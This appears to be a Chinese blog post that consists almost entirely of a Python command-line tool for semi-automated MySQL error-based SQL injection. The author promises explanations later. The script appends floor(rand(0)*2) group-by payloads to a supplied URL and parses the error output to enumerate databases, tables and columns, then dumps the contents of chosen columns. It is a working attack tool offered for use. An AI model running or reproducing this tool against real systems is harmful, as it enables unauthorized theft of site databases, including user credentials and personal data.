sql注入半自动化扫描工具——报错注入(分析后续补上)

代码展示墙：

关于注释和解析以后会补上

现在只是先将代码保存在这里

# -*- coding: utf-8 -*-
import requests
import sys
import hashlib
from optparse import OptionParser
import re

parser=OptionParser()

parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

def main():
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database ==None and options.table == None and options.column == None:
        getAllDatabases(options.url)
    elif  options.url != None and options.database !=None and options.table == None and options.column == None:
        getAllTables(options.url,options.database)
    elif  options.url != None and options.database !=None and options.table != None and options.column == None:
        getAllColumnsByTable(options.url,options.table,options.database)
    elif  options.url != None and options.database !=None and options.table != None and options.column != None:
        getAllContent(options.url,options.column,options.table,options.database)

def http_get(url):
 a=requests.get(url)
 return a.content

def getAllDatabases(url):
 db_number_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(schema_name),'^_^') from information_schema.schemata),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) "
 html=http_get(db_number_payload)
 htmlc=str(html)
 db_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc,re.M).group(1))
 for i in range(db_number):
  db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',schema_name,'^_^') from information_schema.schemata limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % i
  db_name_get=http_get(db_name_payload)
  db_name_res=str(db_name_get)
  db_name_res_re=re.search(r'\^_\^(.*?)\^_\^',db_name_res,re.M)
  db_name=db_name_res_re.group(1)
  print(db_name)

def getAllTables(url,database):
 db_table_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(table_name),'^_^') from information_schema.tables where table_schema='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % database
 html=str(http_get(db_table_payload))
 db_table_number=int(re.search(r'\^_\^(.*?)\^_\^',html).group(1))
 for i in range(db_table_number):
  db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',table_name,'^_^') from information_schema.tables where table_schema='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (database,i)
  htmlc=str(http_get(db_name_payload))
  db_table_name=re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1)
  print(db_table_name)

def getAllColumnsByTable(url,table,database):
 db_cl_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(column_name),'^_^') from information_schema.columns where table_name='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % table
 htmlc=str(http_get(db_cl_payload))
 db_cl_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
 #print(db_cl_number)
 for i in range(db_cl_number):
  db_cl_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',column_name,'^_^') from information_schema.columns where table_name='%s'  limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (table,i)
  html_cl=str(http_get(db_cl_name_payload))
  db_cl_name=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
  print(db_cl_name)

def getAllContent(url,column,table,database):
 db_ct_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(%s),'^_^') from %s.%s),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table)
 htmlc=str(http_get(db_ct_payload))
 db_ct_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
 for i in range(db_ct_number):
  db_ct_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',%s,'^_^') from %s.%s limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table,i)
  html_cl=str(http_get(db_ct_name_payload))
  db_ct_string=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
  print(db_ct_string)

main()